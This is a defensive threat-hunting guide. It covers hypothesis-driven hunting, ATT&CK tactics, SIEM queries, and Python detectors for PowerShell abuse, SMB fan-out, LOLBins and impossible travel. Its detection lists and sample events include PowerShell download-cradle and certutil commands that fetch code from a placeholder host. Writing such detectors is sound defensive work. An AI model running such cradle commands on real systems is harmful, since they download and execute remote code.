The Shift from Reactive to Proactive
Traditional security assumes your defenses will block most threats. Threat hunting assumes adversaries are already in your network and actively searches for them.
What is Threat Hunting?
**Definition:** The proactive and iterative process of searching for cyber threats that evade existing security solutions.
Key Principles:
The Threat Hunting Loop
1. Hypothesis Generation
Sources of Hypotheses:
Example Hypotheses:
2. Data Collection
Required Data Sources:
Endpoint Data:
Network Data:
Authentication Logs:
3. Investigation
Analysis Techniques:
Statistical Analysis:
Pattern Matching:
4. Response & Documentation
Actions:
MITRE ATT&CK Framework
Using ATT&CK for Hunting
Tactic-Based Approach:
Initial Access:
Execution:
Persistence:
Privilege Escalation:
Hunting Methodologies
1. Intel-Driven Hunting
Process:
5. Create detections
**Example:** APT group known to use specific PowerShell patterns.
2. Hypothesis-Driven Hunting
Process:
**Example:** "Attackers are using WMI for lateral movement"
3. Baseline Anomaly Hunting
Process:
**Example:** Process creating unusual network connections
Hunting Queries
PowerShell Analysis
Suspicious PowerShell Patterns:
```text
# Base64 encoding usage
*-EncodedCommand*
*FromBase64String*

# Download cradles
*IEX*
*Invoke-Expression*
*Net.WebClient*
*DownloadString*

# Obfuscation indicators
*-Join*
*Replace*
*Split*
```
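The patterns above are wildcards; turning them into a hunt means deciding how much each one is worth, because `-Join`, `Replace` and `Split` appear in countless legitimate scripts while `-EncodedCommand` and a `Net.WebClient` download cradle rarely do. The following is an added example, not code from the original article: it scores process command lines against the listed indicators and only flags a host when the combined weight crosses a threshold. The weights, the threshold and the sample events are assumptions made for this example.

```python
import re

# Indicator patterns from the list above, each with a weight. The weights are an
# assumption for this example: -EncodedCommand and download cradles are specific
# to attacker tradecraft, while the string operators should only add to an
# existing suspicion rather than trigger on their own.
INDICATORS = [
    # (name, regex, weight)
    ("encoded_command",   re.compile(r"-enc\w*", re.I), 3),   # -enc, -EncodedCommand
    ("from_base64",       re.compile(r"FromBase64String", re.I), 2),
    ("iex",               re.compile(r"\bIEX\b", re.I), 2),
    ("invoke_expression", re.compile(r"Invoke-Expression", re.I), 2),
    ("webclient",         re.compile(r"Net\.WebClient", re.I), 2),
    ("downloadstring",    re.compile(r"DownloadString", re.I), 3),
    ("join",              re.compile(r"-join\b", re.I), 1),
    ("replace",           re.compile(r"\breplace\b", re.I), 1),
    ("split",             re.compile(r"\bsplit\b", re.I), 1),
]

# Flag only when the combined weight reaches this value (assumption).
ALERT_THRESHOLD = 3


def score_command_line(command_line):
    """Return (total_weight, [matched indicator names]) for one command line."""
    matched = [name for name, pattern, _ in INDICATORS if pattern.search(command_line)]
    total = sum(weight for name, _, weight in INDICATORS if name in matched)
    return total, matched


def hunt(events, threshold=ALERT_THRESHOLD):
    """Return the events whose command line scores at or above the threshold."""
    hits = []
    for event in events:
        score, matched = score_command_line(event["command_line"])
        if score >= threshold:
            hits.append({**event, "score": score, "indicators": matched})
    return hits


# Constructed process-creation events; hostnames, URLs and the base64 blob are made up.
SAMPLE_EVENTS = [
    {"host": "ws-0142", "command_line":
        "powershell.exe -NoP -W Hidden -EncodedCommand QUJDREVGR0hJSktMTU5PUFFSU1Q="},
    {"host": "ws-0377", "command_line":
        "powershell.exe -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')\""},
    {"host": "ws-0019", "command_line":
        "powershell.exe -File C:\\Scripts\\nightly-backup.ps1"},
    {"host": "ws-0203", "command_line":
        "powershell.exe -Command \"(Get-Content C:\\lists\\hosts.txt) -join ','\""},
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(f"{hit['host']}: score={hit['score']} indicators={hit['indicators']}")
```

Only the encoded command and the download cradle reach the threshold; the script that merely uses `-join` scores 1 and stays out of the queue, which is the point of weighting the obfuscation indicators low.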
Lateral Movement Detection
SMB Analysis:
```sql
-- Internal hosts fanning out to many SMB (445) targets: a lateral-movement indicator.
-- Only aggregated columns may accompany src_ip, since that is the GROUP BY key,
-- and the HAVING clause repeats the expression rather than relying on an alias.
-- internal_ips is assumed to be a table of your own address inventory with an ip column.
SELECT
  src_ip,
  COUNT(*)               AS connection_count,
  COUNT(DISTINCT dst_ip) AS unique_targets
FROM network_connections
WHERE dst_port = 445
  AND src_ip IN (SELECT ip FROM internal_ips)
GROUP BY src_ip
HAVING COUNT(DISTINCT dst_ip) > 10;
```
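To show the fan-out query doing its job, here is an added example (not from the original article) that loads constructed flow records into an in-memory SQLite database and runs the query against them. The `internal_ips` table with an `ip` column stands in for whatever asset inventory you hold; the IP addresses, port mix and threshold are assumptions made for this example.

```python
import sqlite3

# The hunt query, parameterised on the fan-out threshold. internal_ips is assumed
# to be an inventory table with a single ip column.
QUERY = """
SELECT
  src_ip,
  COUNT(*)               AS connection_count,
  COUNT(DISTINCT dst_ip) AS unique_targets
FROM network_connections
WHERE dst_port = 445
  AND src_ip IN (SELECT ip FROM internal_ips)
GROUP BY src_ip
HAVING COUNT(DISTINCT dst_ip) > :threshold
ORDER BY unique_targets DESC
"""


def build_sample_db():
    """Create an in-memory database with constructed flow records (all addresses are made up)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE network_connections (src_ip TEXT, dst_ip TEXT, dst_port INTEGER);
        CREATE TABLE internal_ips (ip TEXT PRIMARY KEY);
    """)
    rows = []
    # 10.0.1.15 touches 12 distinct hosts on 445: the fan-out we are hunting for.
    rows += [("10.0.1.15", f"10.0.2.{i}", 445) for i in range(1, 13)]
    # 10.0.1.20 opens 40 sessions to one file server: high volume, one target, normal.
    rows += [("10.0.1.20", "10.0.5.5", 445)] * 40
    # 10.0.1.30 reaches 15 hosts on RDP: interesting, but outside this SMB hunt.
    rows += [("10.0.1.30", f"10.0.2.{i}", 3389) for i in range(1, 16)]
    # 203.0.113.5 is external and therefore excluded by the internal_ips filter.
    rows += [("203.0.113.5", f"10.0.2.{i}", 445) for i in range(1, 16)]
    conn.executemany("INSERT INTO network_connections VALUES (?, ?, ?)", rows)
    conn.executemany("INSERT INTO internal_ips VALUES (?)",
                     [(ip,) for ip in ("10.0.1.15", "10.0.1.20", "10.0.1.30")])
    return conn


def smb_fanout(conn, threshold=10):
    """Return (src_ip, connection_count, unique_targets) rows exceeding the threshold."""
    return conn.execute(QUERY, {"threshold": threshold}).fetchall()


if __name__ == "__main__":
    db = build_sample_db()
    for src_ip, connections, targets in smb_fanout(db):
        print(f"{src_ip}: {connections} SMB connections to {targets} distinct hosts")
```

Note how the single-target file-server client does not appear even though it has the highest connection count: the hunt keys on distinct destinations, not volume, which is what separates a busy workstation from one probing its neighbours.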
Credential Access
LSASS Memory Access:
- Process accessing LSASS memory
- Source: non-system processes
- Filter: not in whitelist (AV, EDR)
- Action: alert + investigate
Tools for Threat Hunting
EDR Platforms
- Query historical endpoint data
- Process tree visualization
- File reputation checking
- Network connection tracking
SIEM Analysis
Splunk Queries:
```text
# Find rare processes with network activity
index=endpoint sourcetype=process
| stats count by process_name, dest_ip
| where count < 5
```
Elastic Query:
```json
{
  "query": {
    "bool": {
      "must": [
        {"match": {"event.action": "process_creation"}},
        {"regexp": {"process.command_line": ".*powershell.*-enc.*"}}
      ]
    }
  }
}
```
Custom Scripts
Python for Log Analysis:
```python
import pandas as pd

# Load Windows event logs (a CSV export with at least event_id and hour columns)
df = pd.read_csv('security_logs.csv')

# Find successful logons (event 4624) after hours, i.e. 22:00 through 06:59.
# The OR has to be parenthesised: '&' binds tighter than '|', so without the
# inner parentheses every row with hour <= 6 would match regardless of event_id.
after_hours = (df['hour'] >= 22) | (df['hour'] <= 6)
suspicious = df[(df['event_id'] == 4624) & after_hours]
print(f"After-hours logons: {len(suspicious)}")
```
Hunt Scenarios
Scenario 1: Living Off the Land
**Hypothesis:** Attackers using built-in Windows tools
Hunt:
- Search for unusual parent-child relationships
- Look for LOLBins (certutil, bitsadmin, etc.)
- Check for execution from unusual locations
- Analyze command-line parameters
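The four hunt steps for this scenario combine naturally into one check per process-creation event: a LOLBin on its own proves nothing, but a LOLBin spawned by a document viewer, running from a user-writable directory, or handed a URL does. The following is an added example, not code from the original article. The LOLBin list extends the two names in the scenario with a few other well-known ones, and the parent application list, the expected system directories and the sample events are all assumptions made for this example.

```python
import re
from pathlib import PureWindowsPath

# Built-in binaries commonly abused as LOLBins. certutil and bitsadmin come from
# the scenario text; the remaining names are well-known additions (assumption).
LOLBINS = {"certutil.exe", "bitsadmin.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}

# Parents that should rarely, if ever, spawn a shell or a LOLBin (assumption).
DOCUMENT_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}

# Where the genuine Windows copies of these binaries live.
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
URL_RE = re.compile(r"https?://", re.I)


def analyze(event):
    """Return a list of findings for one process-creation event ([] if nothing stands out)."""
    image = PureWindowsPath(event["image"])
    parent = PureWindowsPath(event["parent_image"]).name.lower()
    name = image.name.lower()
    directory = str(image.parent).lower()
    cmdline = event["command_line"]
    findings = []

    # 1. Unusual parent-child relationship: a document viewer or browser spawning
    #    a shell or LOLBin is the classic follow-on to a macro or exploit.
    if parent in DOCUMENT_APPS | BROWSERS and name in SHELLS | LOLBINS:
        findings.append(f"{parent} spawned {name}")

    # 2. Execution from an unusual location: a copy of a system binary outside the
    #    system directories was dropped or renamed rather than being the real one.
    if name in LOLBINS | SHELLS and not directory.startswith(SYSTEM_DIRS):
        findings.append(f"{name} executed from {directory}")

    # 3. Command-line parameters: a LOLBin handed a URL is acting as a downloader.
    if name in LOLBINS and URL_RE.search(cmdline):
        findings.append(f"{name} given a URL on the command line")

    return findings


def hunt(events):
    """Return (host, findings) for every event that produced at least one finding."""
    results = []
    for event in events:
        findings = analyze(event)
        if findings:
            results.append((event["host"], findings))
    return results


# Constructed events; hostnames, usernames and URLs are made up.
SAMPLE_EVENTS = [
    {"host": "ws-0142",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\certutil.exe",
     "command_line": "certutil.exe -urlcache -f http://example.invalid/doc.txt doc.txt"},
    {"host": "ws-0377",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Users\alice\AppData\Local\Temp\bitsadmin.exe",
     "command_line": "bitsadmin.exe /list"},
    {"host": "ws-0019",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "command_line": r"certutil.exe -verify C:\certs\root.cer"},
    {"host": "ws-0203",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -File C:\Scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for host, findings in hunt(SAMPLE_EVENTS):
        print(f"{host}: {'; '.join(findings)}")
```

The third event is a genuine certutil run from System32 under svchost and produces nothing, which is the behaviour you want: the hunt is about the context a LOLBin runs in, not its presence, so the analyst's queue stays short enough to work.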
Scenario 2: Data Exfiltration
**Hypothesis:** Large volumes of data leaving network
Hunt:
- Analyze outbound traffic volumes
- Identify unusual upload patterns
- Check DNS query volumes
- Investigate cloud storage uploads
Scenario 3: Account Compromise
**Hypothesis:** Credentials being used from unusual locations
Hunt:
- Baseline normal login patterns
- Detect geographically impossible travel
- Identify after-hours access
- Check for simultaneous logins
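Impossible travel, after-hours access and simultaneous logins can all be derived from the same logon records once each source address has been resolved to coordinates. The following is an added example, not code from the original article: it sorts each user's logons, computes the great-circle distance between consecutive ones, and flags pairs whose implied speed no traveller could achieve, treating two different locations with no time gap (simultaneous sessions) as the limiting case. The 900 km/h ceiling, the after-hours window and the sample logons (with a GeoIP lookup assumed to have happened upstream) are assumptions made for this example.

```python
from datetime import datetime
from math import radians, sin, cos, asin, sqrt

EARTH_RADIUS_KM = 6371.0
MAX_SPEED_KMH = 900.0    # assumption: faster than an airliner counts as impossible travel
AFTER_HOURS = (22, 6)    # 22:00 through 06:59, the same window used in the pandas snippet


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two WGS84 points, in kilometres."""
    p1, p2 = radians(lat1), radians(lat2)
    dlat, dlon = p2 - p1, radians(lon2 - lon1)
    a = sin(dlat / 2) ** 2 + cos(p1) * cos(p2) * sin(dlon / 2) ** 2
    return 2 * EARTH_RADIUS_KM * asin(sqrt(a))


def impossible_travel(logons, max_speed_kmh=MAX_SPEED_KMH):
    """Flag consecutive logons by one user whose implied speed exceeds max_speed_kmh.

    Two different locations with a zero time gap (simultaneous sessions) are
    reported as well; a naive km/hours division would raise instead of flagging them.
    """
    by_user = {}
    for entry in logons:
        by_user.setdefault(entry["user"], []).append(entry)

    hits = []
    for user, events in by_user.items():
        events.sort(key=lambda e: e["time"])
        for prev, cur in zip(events, events[1:]):
            km = haversine_km(prev["lat"], prev["lon"], cur["lat"], cur["lon"])
            if km == 0:
                continue                       # same place twice: nothing to explain
            hours = (cur["time"] - prev["time"]).total_seconds() / 3600
            if hours == 0 or km / hours > max_speed_kmh:
                hits.append({"user": user, "from_ip": prev["ip"], "to_ip": cur["ip"],
                             "km": round(km), "minutes": round(hours * 60)})
    return hits


def after_hours_logons(logons, window=AFTER_HOURS):
    """Return logons whose hour falls at or after the window start or at or before its end."""
    start, end = window
    return [entry for entry in logons if entry["time"].hour >= start or entry["time"].hour <= end]


def logon(user, iso_time, ip, lat, lon):
    return {"user": user, "time": datetime.fromisoformat(iso_time), "ip": ip, "lat": lat, "lon": lon}


# Constructed logons; users, addresses and dates are made up, coordinates are the cities named.
SAMPLE_LOGONS = [
    logon("alice", "2024-03-04T09:00:00+00:00", "203.0.113.10", 52.520, 13.405),    # Berlin
    logon("alice", "2024-03-04T09:35:00+00:00", "198.51.100.7", -23.550, -46.633),  # Sao Paulo, 35 min later
    logon("bob",   "2024-03-04T08:00:00+00:00", "203.0.113.10", 52.520, 13.405),    # Berlin
    logon("bob",   "2024-03-04T14:00:00+00:00", "203.0.113.44", 48.137, 11.575),    # Munich, 6 h later
    logon("carol", "2024-03-04T02:30:00+00:00", "203.0.113.10", 52.520, 13.405),    # Berlin, 02:30
]

if __name__ == "__main__":
    for hit in impossible_travel(SAMPLE_LOGONS):
        print(f"impossible travel: {hit}")
    for entry in after_hours_logons(SAMPLE_LOGONS):
        print(f"after-hours logon: {entry['user']} at {entry['time']:%H:%M}")
```

Bob's Berlin-to-Munich day (about 500 km in six hours) passes, while Alice's Berlin-to-Sao-Paulo pair (over 10,000 km in 35 minutes) is flagged; a VPN concentrator or a shared egress address is the usual benign explanation, which is why the baseline of normal login patterns belongs in the same hunt.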
Hunting Maturity Levels
Level 0: Initial
- No formal hunting program
- Reactive only
Level 1: Minimal
- Ad-hoc hunting
- Limited data sources
- Manual processes
Level 2: Procedural
- Documented procedures
- Regular hunting cadence
- Multiple data sources
Level 3: Innovative
- Automated hunting workflows
- Custom analytics
- Integration with threat intel
Level 4: Leading
- Continuous hunting
- ML-assisted analysis
- Proactive threat modeling
Building a Hunting Program
Phase 1: Foundation (Months 1-3)
**Data Collection**
- Enable logging
- Centralize in SIEM
- Ensure retention

**Baseline Establishment**
- Normal user behavior
- Common processes
- Network patterns

**Tool Selection**
- EDR platform
- SIEM solution
- Analysis tools
Phase 2: Operationalization (Months 4-6)
**Create Playbooks**
- Document hunt procedures
- Define success criteria
- Establish metrics

**Schedule Hunts**
- Weekly tactical hunts
- Monthly strategic hunts
- Quarterly deep dives

**Train Team**
- TTP familiarization
- Tool proficiency
- Analysis techniques
Phase 3: Maturity (Months 7-12)
**Automation**
- Automated data collection
- Scripted queries
- Alert orchestration

**Metrics**
- Hunts conducted
- Threats found
- Time to detection

**Improvement**
- Playbook refinement
- Detection rule creation
- Process optimization
Success Metrics
Hunt Metrics:
- Hunts conducted per month
- Average hunt duration
- Hypotheses tested
Detection Metrics:
- Threats discovered
- Mean time to detection
- False positive rate
Program Metrics:
- Coverage of ATT&CK techniques
- Data source completeness
- Team capability growth